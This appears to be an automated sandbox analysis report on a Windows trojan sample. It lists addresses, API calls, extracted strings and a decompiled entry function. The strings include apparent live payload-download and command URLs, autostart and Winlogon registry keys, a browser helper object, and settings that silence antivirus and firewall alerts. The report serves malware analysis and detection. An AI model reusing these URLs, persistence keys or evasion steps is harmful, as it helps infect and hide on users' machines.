0x00405aa6
0x00000000
0x00000000
0x00405aa8
0x00405aa9
0x00405abe
0x00405ada
0x00405ae6
0x00405af6
0x00405afb
0x00405afd
0x00000000
0x00000000
0x00405aff
0x00405b06
0x00000000
0x00405b06
0x00405a3f
0x00405a44
0x00405a46
0x00000000
0x00000000
0x00405a53
0x00405a58
0x00405a59
0x00405a71
0x00405a8d
0x00000000
0x00405a8d
0x004059de
0x004059e3
0x004059e5
0x00000000
0x00000000
0x00000000
0x004059e5
0x00405908
0x0040590d
0x0040590e
0x00405914
0x00405915
0x00405916
0x00405918
0x0040591a
0x00405971
0x00405978
0x00405984
0x00000000
0x00405984
0x00405b0b
0x00405b15
0x00405b1f
0x00405b24
0x00405b24
0x00405b24
0x00405b24
0x00405b4c
0x00405b51
0x00405b53
0x00405b59
0x00405b66
0x00405b78
0x00405b7d
0x00405b7f
0x00405b85
0x00405b86
0x00405b88
0x00405b8c
0x00405bae
0x00405bb8
0x00405bbd
0x00405bc4
0x00405be5
0x00405bc6
0x00405bd1
0x00405bd9
0x00405bd9
0x00405b8e
0x00405b9e
0x00405b9e
0x00405b8c
0x00405bee
0x00405bee
0x00000000
0x00405b53
0x00405583
0x00405588
0x0040558a
0x004057de
0x004057e2
0x00000000
0x00000000
0x004057e4
0x004057e4
0x00000000
0x004057e4
0x00405590
0x00405595
0x0040559a
0x004055a7
0x004055bf
0x004055c4
0x004055c6
0x004055dc
0x004055e8
0x004055ed
0x00405669
0x00405669
0x00405670
0x004056a9
0x004056a9
0x004056cf
0x004056d1
0x004056e7
0x004056e7
0x004056ec
0x004056ee
0x004057cc
0x004057d0
0x00000000
0x004057d0
0x004056f4
0x004056fd
0x004056ff
0x00405705
0x00405708
0x0040572b
0x0040572b
0x00405738
0x00405750
0x00405755
0x00405757
0x00405761
0x00405761
0x00405766
0x00405769
0x0040576d
0x0040576d
0x0040577c
0x00405781
0x00000000
0x00405783
0x00405783
0x00405788
0x0040578a
0x00000000
0x00000000
0x0040578c
0x00405795
0x00405797
0x0040579d
0x004057a0
0x00000000
0x00000000
0x004057a2
0x004057a4
0x004057a5
0x004057a7
0x004057a9
0x004057ae
0x004057b5
0x004057be
0x004057c3
0x00000000
0x004057c3
0x00405781
0x00405712
0x00405716
0x0040571a
0x0040571c
0x0040571d
0x0040571f
0x00405721
0x00000000
0x00405721
0x004056e0
0x004056e5
0x00000000
0x00000000
0x00000000
0x004056e5
0x00405672
0x0040567b
0x0040567d
0x00405683
0x00405686
0x00000000
0x00000000
0x00405690
0x00405694
0x00405698
0x0040569a
0x0040569b
0x0040569d
0x0040569f
0x00000000
0x0040569f
0x004055ef
0x004055f4
0x004055f6
0x00000000
0x00000000
0x00405605
0x0040560b
0x0040560d
0x0040560f
0x00405611
0x00405619
0x0040561f
0x00405622
0x00405624
0x00405624
0x00405622
0x0040562a
0x0040562f
0x00405631
0x0040565f
0x00405633
0x0040563b
0x00405640
0x00405642
0x00405647
0x0040564d
0x0040564f
0x00405654
0x00405656
0x00405656
0x00405654
0x00405658
0x00405658
0x00000000
0x00405631
0x004055cc
0x004055d1
0x004055d6
0x00000000
0x00000000
0x00000000
0x004057ee
0x004057ee
0x004057ee
0x004057ee
0x00000000
0x004057ee
0x0040552e
0x0040528c
0x00405291
0x00405291
0x00405296
0x00000000
0x00000000
0x00405298
0x0040529b
0x0040529b
0x0040529e
0x004052a3
0x004052a3
0x004052a8
0x00000000
0x00000000
0x004052aa
0x004052ad
0x004052ad
0x004052b0
0x004052c2
0x004052c7
0x004052c9
0x004052e5
0x004052f1
0x004052f1
0x004052f6
0x004052fb
0x004052fb
0x00405300
0x00000000
0x00000000
0x00405302
0x00405305
0x00405305
0x00405308
0x0040530d
0x0040530d
0x00405312
0x00000000
0x00000000
0x00405314
0x00405317
0x00405317
0x0040531a
0x0040531f
0x0040531f
0x00405324
0x00000000
0x00000000
0x00405326
0x00405329
0x00405329
0x0040532c
0x00405331
0x00405331
0x00405336
0x00000000
0x00000000
0x00405338
0x0040533b
0x0040533b
0x0040533e
0x00405343
0x00405343
0x00405348
0x00000000
0x00000000
0x0040534a
0x0040534d
0x0040534d
0x00405362
0x00405367
0x00405369
0x0040536d
0x00405385
0x0040539d
0x004053b5
0x004053cd
0x004053d9
0x004053d9
0x004053de
0x004053e3
0x004053e3
0x004053e8
0x00000000
0x00000000
0x004053ea
0x004053ed
0x004053ed
0x00405402
0x00405407
0x00405409
0x00000000
0x00000000
0x00405413
0x00405418
0x00405420
0x00405422
0x00405427
0x00405432
0x00405432
0x00405437
0x00000000
0x00000000
0x00405439
0x0040543c
0x0040543c
0x0040543f
0x00405484
0x00405488
0x00405488
0x004054ab
0x004054b0
0x004054b2
0x00000000
0x00000000
0x00405449
0x0040544e
0x00405457
0x0040545c
0x0040545e
0x00405468
0x00405468
0x0040545e
0x0040546d
0x0040546d
0x0040546d
0x00405471
0x00405479
0x00405479
0x004054b4
0x004054c7
0x004054c7
0x004054c8
0x004054d9
0x004054e0
0x004054ec
0x00000000
0x004054ec
0x00405220
0x00405225
0x00405227
0x00000000
0x00000000
0x00000000
0x00405227
0x00405126
0x00405129
0x00000000
0x00000000
0x0040512b
0x00405140
0x0040514c
0x00000000
0x0040514c
0x004050d3
0x004050d6
0x00000000
0x00000000
0x00000000
0x004050d6
0x00405045
0x00405046
0x00404ee1
0x00404efc
0x00404f01
0x00404f06
0x00404f27
0x00404f27
0x00404f33
0x00404f38
0x00404f40
0x00404f42
0x00404f47
0x00404f4f
0x00404f54
0x00404f57
0x00404f59
0x00404f5b
0x00404f5d
0x00404f63
0x00404f68
0x00404f68
0x00404f6b
0x00404f6d
0x00404f72
0x0040505c
0x0040505c
0x00405061
0x0040507b
0x00000000
0x0040507b
0x00000000
0x00405046
0x00404fef
0x00404ff0
0x00000000
0x00000000
0x00000000
0x00404ff0
0x00404f82
0x00404f82
0x00404f8a
0x00404f8c
0x00404f98
0x00000000
0x00404f98
0x00404eda
0x00404edb
0x00000000
0x00000000
0x00000000
0x00404edb
0x00404c71
0x00404c78
0x00404c78
0x00000000
0x00404c16
0x00404ba2
0x004049e3
0x004049e6
0x00404a01
0x00404a06
0x00404a0b
0x00404a0f
0x00404a11
0x00404a13
0x00404a13
0x00404a1b
0x00404a20
0x00404a25
0x00404a27
0x00404a29
0x00404a2d
0x00404a30
0x00404a30
0x00404a32
0x00000000
0x00000000
0x00404a39
0x00404a3b
0x00404a3c
0x00404a3e
0x00404a3f
0x00404a3f
0x00404a44
0x00404a4b
0x00404a4e
0x00404a4f
0x00404a54
0x00404a5b
0x00404a5d
0x00404a64
0x00404a66
0x00404a67
0x00404a6b
0x00404a6b
0x00404a6f
0x00404a7a
0x00404a7d
0x00404a81
0x00404a83
0x00404a84
0x00404a89
0x00404a8c
0x00404a8c
0x00404a8e
0x00000000
0x00000000
0x00404a95
0x00404a97
0x00404a98
0x00404a98
0x00404a98
0x00404ab4
0x00404abb
0x00404ac0
0x00404ac5
0x00404ae6
0x00404ae6
0x00404af2
0x00404b06
0x00404b0e
0x00404b1a
0x00404b1f
0x00404b44
0x00404b49
0x00404b4a
0x00404b4f
0x00404b4f
0x00404b62
0x00404b67
0x00404b67
0x00404961
0x00404966
0x00404977
0x0040497c
0x00404983
0x00404985
0x004049a5
0x00404987
0x0040498d
0x00404999
0x00404999
0x00000000
0x00404968
0x00404968
0x0040496b
0x00000000
0x0040496b

APIs

GetSystemDirectoryA.KERNEL32 ref: 00404940
lstrcat.KERNEL32(?,0041103E), ref: 00404951
lstrcat.KERNEL32(00000000,?), ref: 00404957
CreateMutexA.KERNEL32(00000000,00000000,{0C8E6D89-EA51-848A-7775-6C2CC072CA88},00000000,?,0041103E,?,00000104), ref: 00404977
WaitForSingleObject.KERNEL32(00000000,00002710,00000000,00000000,{0C8E6D89-EA51-848A-7775-6C2CC072CA88},00000000,?,0041103E,?,00000104), ref: 0040498D
CloseHandle.KERNEL32(?,00000000,00002710,00000000,00000000,{0C8E6D89-EA51-848A-7775-6C2CC072CA88},00000000,?,0041103E,?,00000104), ref: 00404999
Sleep.KERNEL32(000007D0,00000000,00000000,{0C8E6D89-EA51-848A-7775-6C2CC072CA88},00000000,?,0041103E,?,00000104), ref: 004049A5
SetFileAttributesA.KERNEL32(?,00000080,000007D0,00000000,00000000,{0C8E6D89-EA51-848A-7775-6C2CC072CA88},00000000,?,0041103E,?,00000104), ref: 004049B7
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,{0C8E6D89-EA51-848A-7775-6C2CC072CA88},00000000,?,0041103E), ref: 004049CF
WriteFile.KERNEL32(00000000,004072A0,00000800,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000), ref: 00404A01
lstrlen.KERNEL32(?,00000000,004072A0,00000800,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0), ref: 00404A4F
lstrcpy.KERNEL32(?,?), ref: 00404A84
WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,004072A0,00000800,?,00000000,?,40000000,00000000), ref: 00404AB4
SetFileTime.KERNEL32(?,?,?,?,?,00000000,?,?,00000000,?,?,?,00000000,004072A0,00000800,?), ref: 00404AE6
CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,00000000,004072A0,00000800,?,00000000,?,40000000), ref: 00404AF2
RegSetValueExA.ADVAPI32(?,IsInstalled,00000000,00000004,?,00000004,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000), ref: 00404B44
lstrlen.KERNEL32(?,?,IsInstalled,00000000,00000004,?,00000004,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00404B4A
RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,?,00000001,?,?,IsInstalled,00000000,00000004,?,00000004,?,80000000,00000001), ref: 00404B62
RegCloseKey.ADVAPI32(?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000,00000000,{0C8E6D89-EA51-848A-7775-6C2CC072CA88},00000000,?), ref: 00404B76
RegDeleteKeyA.ADVAPI32(80000001,?), ref: 00404B88

Part of subcall function 004030DE: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,SOFTWARE\Microsoft\Active Setup\Installed Components\,{38383738-3439-3838-3738-343938383738}), ref: 004030FB
Part of subcall function 004030DE: RegQueryValueExA.ADVAPI32(?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 00403122
Part of subcall function 004030DE: RegCloseKey.ADVAPI32(0002001F,?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040312F
Part of subcall function 004030DE: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,SOFTWARE\Microsoft\Active Setup\Installed Components\,{38383738-3439-3838-3738-343938383738}), ref: 00403146
Part of subcall function 004030DE: RegQueryValueExA.ADVAPI32(0002001F,SubshellState,00000000,0002001F,?,0000022A,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040316D

RegDeleteValueA.ADVAPI32(00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0,00000000), ref: 00404BAE
RegCloseKey.ADVAPI32(?,00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000080,000007D0), ref: 00404BBA
lstrcmpi.KERNEL32 ref: 00404BF6
lstrcmpi.KERNEL32 ref: 00404C0F
SetFileAttributesA.KERNEL32(?,00000080,?,?,00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404C25
DeleteFileA.KERNEL32(?,?,00000080,?,?,00000000,SubshellState,80000001,?,?,?,40000000,00000000,00000000,00000002,00000080), ref: 00404C2B
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00000000,SubshellState,80000001,?,?), ref: 00404C4C
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,00000000,SubshellState,80000001), ref: 00404C64
CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,?), ref: 00404C78
ReadFile.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00404C9B
lstrcpy.KERNEL32(?,00000000), ref: 00404D1B
lstrcpy.KERNEL32(?,?), ref: 00404D30
GetSystemDirectoryA.KERNEL32 ref: 00404E8C
lstrcat.KERNEL32(?,0041103E), ref: 00404EA2
lstrcat.KERNEL32(00000000,?), ref: 00404EA8
SetFileAttributesA.KERNEL32(00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000,?,?,00000000,00000000,00000000,?,80000000), ref: 00404EAE
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,0041103E,00000080,?,00000104,?,00000000), ref: 00404EC6
WriteFile.KERNEL32(?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080,00000104), ref: 00404EFC
SetFileTime.KERNEL32(?,?,?,?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404F27
CloseHandle.KERNEL32(?,?,0040E640,00001400,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,00000080), ref: 00404F33
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?), ref: 00404B0E

Part of subcall function 00401251: RegSetValueExW.ADVAPI32(?,?,00000000,00000001,00411035,00000004), ref: 004012B2

Strings

g00d d0gg, xrefs: 00405B6F, 00405B95, 00405BA5
IsInstalled, xrefs: 00404B38, 00405891
StubPath, xrefs: 00404B56, 004058AF
winrnt.exe, xrefs: 00405262
http://69.50.173.166/gdnOT2424.exe, xrefs: 004056F8
NoAutoUpdate, xrefs: 0040529E, 004052D9
SubshellState, xrefs: 00404BA8, 004059F8
explorer.exe, xrefs: 00404F5D, 0040581F
winlogon.exe, xrefs: 00404F42
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 004051D3, 004051F4, 00405216, 00405929, 00405944
%CommonProgramFiles%\System\, xrefs: 004051AB
p A, xrefs: 004055DC
ThreadingModel, xrefs: 00405ACE
CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32, xrefs: 00405A95
{0C8E6D89-EA51-848A-7775-6C2CC072CA88}, xrefs: 0040495C, 0040496E
tombul.gif, xrefs: 00405790
opera.exe, xrefs: 00405806
UseDflProfile, xrefs: 00405744, 004057A9
http://utbidet-ugeas.biz/d/cc, xrefs: 00405600
AntiVirusDisableNotify, xrefs: 0040531A, 00405391
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}, xrefs: 00405A35
Startup, xrefs: 00405A78, 00405A81
iexplore.exe, xrefs: 0040581A
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00405579, 004059AE, 004059D4, 00405B42
DLLName, xrefs: 00405A65
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 004053DE, 004053F8
grazie.gif, xrefs: 00405676
AntiVirusOverride, xrefs: 00405308, 00405379
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU, xrefs: 0040528C, 004052B8
ConnPred, xrefs: 004055B3, 0040569F
UseExtProfile, xrefs: 004056BE, 00405721
FirewallDisableNotify, xrefs: 0040532C, 004053A9
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe, xrefs: 004058EA
UpdatesDisableNotify, xrefs: 0040533E, 004053C1
firefox.exe, xrefs: 00405815
SOFTWARE\Microsoft\Security Center, xrefs: 004052F6, 00405358
kernel32.dll, xrefs: 00404F6D, 00404F8C
I, xrefs: 00405642
T, xrefs: 0040564F
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}, xrefs: 00405AEC
seamonkey.exe, xrefs: 0040580B
Debugger, xrefs: 0040591A
sOfTwaRe\mIcRoSofT\cOdE SToRe dAtAbAsE\Distribution Units\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}, xrefs: 00405514, 0040552E
Both, xrefs: 00405AC5
mozilla.exe, xrefs: 00405810
;, xrefs: 004057F2
%AppData%\, xrefs: 00404FAB, 0040508D, 004051C2

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: File$Close$Value$Create$Handlelstrcat$AttributesDeleteWritelstrcpy$DirectoryOpenQuerySystemTimelstrcmpilstrlen$MutexObjectReadSingleSizeSleepWait
String ID: %AppData%\$%CommonProgramFiles%\System\$;$AntiVirusDisableNotify$AntiVirusOverride$Both$CLSID\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\InProcServer32$ConnPred$DLLName$Debugger$FirewallDisableNotify$I$IsInstalled$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run$Startup$StubPath$SubshellState$T$ThreadingModel$UpdatesDisableNotify$UseDflProfile$UseExtProfile$explorer.exe$firefox.exe$g00d d0gg$grazie.gif$http://69.50.173.166/gdnOT2424.exe$http://utbidet-ugeas.biz/d/cc$iexplore.exe$kernel32.dll$mozilla.exe$opera.exe$p A$sOfTwaRe\mIcRoSofT\cOdE SToRe dAtAbAsE\Distribution Units\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}$seamonkey.exe$tombul.gif$winlogon.exe$winrnt.exe${0C8E6D89-EA51-848A-7775-6C2CC072CA88}
API String ID: 4274377182-3125241132
Opcode ID: 08b9d46e55031d1a8d1f183a1f19beb700cdd6a46ef76a400903c5503cdbf5e6
Instruction ID: 95f2c617460066549a7d62f87e1d991e293c345f820f5df1bc7e303eabba92b6
Opcode Fuzzy Hash: 08b9d46e55031d1a8d1f183a1f19beb700cdd6a46ef76a400903c5503cdbf5e6
Instruction Fuzzy Hash: 4F92F970288741BAE730A761CC46F9B7699EF80704F50493FB785B91D2D6BCA8448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 004033EB Relevance: 189.5, APIs: 32, Strings: 76, Instructions: 510
memoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			_entry_() {
				signed char _t492;
				signed char _t493;
				struct HINSTANCE__* _t494;
				CHAR* _t497;
				void* _t498;
				signed char _t499;
				signed int _t505;
				signed int _t506;
				signed char* _t509;
				struct HINSTANCE__* _t510;
				signed char* _t511;
				struct HINSTANCE__* _t512;
				signed char* _t513;
				signed char _t514;
				signed char _t515;
				signed char _t516;
				signed char _t517;
				signed char _t518;
				struct HINSTANCE__* _t519;
				signed char* _t520;
				signed char _t521;
				signed char _t522;
				signed char _t523;
				signed char _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t528;
				signed char _t529;
				signed char _t530;
				signed char _t531;
				signed char _t532;
				signed char _t533;
				signed char _t534;
				signed char _t535;
				signed char _t536;
				signed char _t537;
				signed char _t538;
				signed char _t539;
				signed char _t540;
				signed char _t541;
				signed char _t542;
				signed char _t543;
				signed char _t544;
				signed char _t545;
				signed char _t546;
				signed char _t547;
				signed char _t548;
				signed char _t549;
				signed char _t550;
				signed char _t551;
				signed char _t552;
				signed char _t553;
				signed char _t554;
				signed char _t555;
				signed char _t556;
				signed char _t557;
				signed char _t558;
				signed char _t559;
				signed char _t560;
				signed char _t561;
				signed char _t562;
				signed char _t563;
				signed char _t564;
				signed char _t565;
				signed char _t566;
				signed char _t567;
				signed char _t568;
				signed char _t569;
				signed char _t570;
				signed char _t571;
				signed char _t572;
				signed char _t573;
				signed char _t574;
				signed char _t575;
				void* _t580;
				signed char* _t581;
				signed char _t582;
				int _t583;
				intOrPtr _t593;
				signed int _t595;
				signed char _t598;
				signed char _t599;
				signed char _t600;
				void* _t602;
				long _t603;
				void* _t604;
				void* _t606;
				void* _t609;
				signed char* _t611;
				void* _t614;
				signed char* _t633;
				void* _t636;
				void* _t638;
				void* _t639;
				void* _t640;
				void* _t644;
				void* _t645;
				void* _t646;
				CHAR* _t649;
				void* _t651;
				long _t652;
				CHAR* _t653;
				void* _t655;
				long _t656;
				CHAR* _t661;
				void* _t663;
				CHAR* _t664;
				void* _t666;
				signed char* _t676;
				void* _t677;
				void* _t680;
				signed char* _t682;
				void* _t685;
				void* _t686;
				void* _t692;
				void* _t693;
				void* _t698;
				void* _t703;
				void* _t705;
				void* _t707;
				void* _t711;
				void* _t713;
				void* _t718;
				long _t722;
				int _t723;
				void* _t729;
				void* _t731;
				void* _t734;
				void* _t741;
				void* _t743;
				void* _t745;
				void* _t750;
				void* _t753;
				void* _t755;
				void* _t758;
				void* _t760;
				void* _t764;
				void* _t769;
				void* _t771;
				void* _t773;
				CHAR* _t777;
				void* _t778;
				void* _t780;
				signed char* _t781;
				signed char* _t782;
				void* _t783;
				signed char* _t784;
				signed char* _t785;
				signed char* _t786;
				signed char* _t787;
				signed char* _t788;
				void* _t789;
				signed char* _t790;
				void* _t791;
				char* _t793;
				CHAR* _t794;
				void* _t798;
				void* _t800;
				int _t803;
				void* _t817;
				int _t818;
				void* _t821;
				CHAR* _t827;
				void* _t829;
				long _t830;
				void* _t835;
				void* _t843;
				void* _t844;
				signed char _t852;
				void* _t858;
				void* _t862;
				void* _t864;
				int _t865;
				void* _t868;
				signed char _t879;
				int _t880;
				signed char* _t881;
				void* _t882;
				void* _t884;
				void* _t889;
				void* _t891;
				void* _t892;
				char* _t893;
				signed int* _t896;
				long _t906;
				int _t907;
				signed char _t917;
				void* _t920;
				void* _t922;
				int _t923;
				signed char* _t924;
				void* _t925;
				void* _t927;
				void* _t930;
				void* _t932;
				void* _t933;
				void* _t934;
				signed int* _t937;
				void* _t946;
				int _t947;
				signed char _t957;
				int _t965;
				CHAR* _t967;
				void* _t973;
				void* _t980;
				CHAR* _t985;
				void* _t986;
				void* _t988;
				void* _t990;
				void* _t997;
				void* _t999;
				void* _t1001;
				void* _t1004;
				signed int _t1007;
				void* _t1011;
				long _t1012;
				int _t1014;
				void* _t1024;
				void* _t1025;
				signed char* _t1093;
				signed char* _t1094;
				signed char* _t1095;
				signed char* _t1096;
				signed char* _t1097;
				signed char* _t1108;
				signed char* _t1110;
				signed char* _t1113;
				signed char* _t1115;
				signed char* _t1116;
				signed char* _t1117;
				signed char* _t1118;
				signed char* _t1119;
				struct HINSTANCE__* _t1120;
				signed int _t1124;
				signed char* _t1125;
				signed char* _t1126;
				void* _t1127;
				void* _t1128;
				void* _t1130;
				signed char* _t1132;
				void* _t1133;
				signed char _t1137;
				intOrPtr _t1139;
				void* _t1140;
				signed char _t1141;
				void* _t1144;
				int _t1147;
				CHAR* _t1156;
				_Unknown_base(*)()* _t1157;
				struct HINSTANCE__* _t1162;
				void* _t1165;
				struct HINSTANCE__* _t1166;
				struct HINSTANCE__* _t1167;
				struct HINSTANCE__* _t1168;
				CHAR* _t1169;
				CHAR* _t1170;
				char* _t1171;
				CHAR* _t1172;
				CHAR* _t1173;
				CHAR* _t1174;
				CHAR* _t1175;
				CHAR* _t1176;
				CHAR* _t1177;
				CHAR* _t1178;
				char* _t1179;
				void** _t1180;
				char* _t1181;
				char* _t1182;
				CHAR* _t1183;
				void* _t1186;
				char* _t1187;
				char* _t1189;
				char* _t1190;
				char* _t1191;
				char* _t1192;
				CHAR* _t1193;
				int _t1194;
				CHAR* _t1195;
				CHAR* _t1196;
				void* _t1197;
				signed int* _t1199;
				char* _t1200;
				void* _t1201;
				CHAR* _t1202;
				CHAR* _t1203;
				void* _t1204;
				signed int* _t1206;
				char* _t1207;
				CHAR* _t1208;
				struct _STARTUPINFOA* _t1209;
				void* _t1210;
				void* _t1211;
				long _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				CHAR* _t1216;
				struct HINSTANCE__* _t1217;
				signed char* _t1218;
				void* _t1219;
				struct _STARTUPINFOA* _t1220;
				signed char _t1221;
				char* _t1225;
				char* _t1226;
				void* _t1227;
				signed char _t1229;
				signed char _t1230;
				intOrPtr* _t1231;
				signed int _t1232;
				signed char _t1237;
				char _t1238;
				char _t1239;
				void* _t1240;
				signed int* _t1264;
				signed char* _t1265;
				signed char* _t1266;
				signed int* _t1268;
				signed int* _t1271;
				void* _t1276;
				void* _t1277;
				char* _t1279;
				signed char* _t1280;
				void* _t1281;
				void* _t1282;
				long _t1283;
				signed int _t1284;
				void* _t1285;
				signed int* _t1287;
				void** _t1288;
				void* _t1290;
				void** _t1291;
				void** _t1292;
				char* _t1293;
				CHAR* _t1294;
				signed char* _t1295;
				char* _t1296;
				signed int* _t1297;
				void* _t1298;
				void* _t1299;
				char* _t1300;
				signed int* _t1301;
				void* _t1302;
				char* _t1303;
				signed int* _t1304;
				CHAR* _t1306;
				void* _t1307;
				void* _t1308;
				signed int* _t1309;
				void* _t1310;
				void* _t1311;
				void* _t1312;
				long _t1313;
				struct _FILETIME* _t1314;
				void* _t1315;
				void* _t1316;
				char* _t1317;

				E00405C00();
				 *(_t1316 + 0x2c) = 0;
				 *(_t1316 + 0x28) = 0;
				 *(_t1316 + 0x24) = 0;
				 *(_t1316 + 0x20) = 0;
				 *(_t1316 + 0xc) = 0;
				 *0x412290 = GetProcessHeap();
				0x4120f0->dwOSVersionInfoSize = 0x94;
				GetVersionExA(0x4120f0);
				_t492 = "--k33p";
				while(_t492 < 0x4107f9) {
					 *_t492 =  *_t492 ^ 0x000000d4;
					_t492 = (_t492 ^ _t1229) + 1;
				}
				_t493 = "kernel32.dll";
				while(1) {
					__eflags = _t493 - 0x4107f2;
					if(_t493 >= 0x4107f2) {
						break;
					}
					 *_t493 =  *_t493 ^ 0x000000d4;
					__eflags =  *_t493;
					_t493 = (_t493 ^ _t1229) + 1;
				}
				_t494 = LoadLibraryA("kernel32.dll");
				__eflags =  *0x412100 - 2;
				_t1162 = _t494;
				if( *0x412100 == 2) {
					L14:
					GetModuleFileNameA(0, _t1316 + 0x156c, 0x104);
					_t497 = GetCommandLineA();
					_t1230 = "--k33p";
					_t498 = E00401311(_t497, _t1230);
					__eflags = _t498;
					if(_t498 == 0) {
						__eflags =  *0x412100 - 2;
						_t499 = 0x410723;
						if( *0x412100 != 2) {
							while(1) {
								__eflags = _t499 - 0x410735;
								if(_t499 >= 0x410735) {
									break;
								}
								 *_t499 =  *_t499 ^ 0x000000d4;
								__eflags =  *_t499;
								_t499 = (_t499 ^ _t1230) + 1;
							}
							_t1231 = GetProcAddress(_t1162, 0x410723);
							while(1) {
								__eflags =  *_t1231 - 0xfff00068;
								if( *_t1231 == 0xfff00068) {
									break;
								}
								_t1231 = _t1231 + 1;
							}
							_t1232 = _t1231 +  *((intOrPtr*)(_t1231 + 7));
							 *0x412270 = _t1232 + 0xb;
							 *0x412280 =  *[fs:0x30];
							 *0x412280 =  *0x412280 ^ GetCurrentProcessId();
							__eflags =  *0x412280;
							L77:
							_push(_t1316 + 0xb78);
							_push(2); // executed
							L004061E0(); // executed
							_t505 = GetTickCount();
							_t506 = GetCurrentProcessId();
							_t1165 = _t505 ^ _t506 ^ GetCurrentThreadId() << 0x00000010;
							__eflags = _t1165;
							_t509 = "rasapi32.dll";
							 *0x4122a0 = _t1165;
							while(1) {
								__eflags = _t509 - 0x410722;
								if(_t509 >= 0x410722) {
									break;
								}
								 *_t509 =  *_t509 ^ 0x000000d4;
								_t509 =  &(_t509[1]);
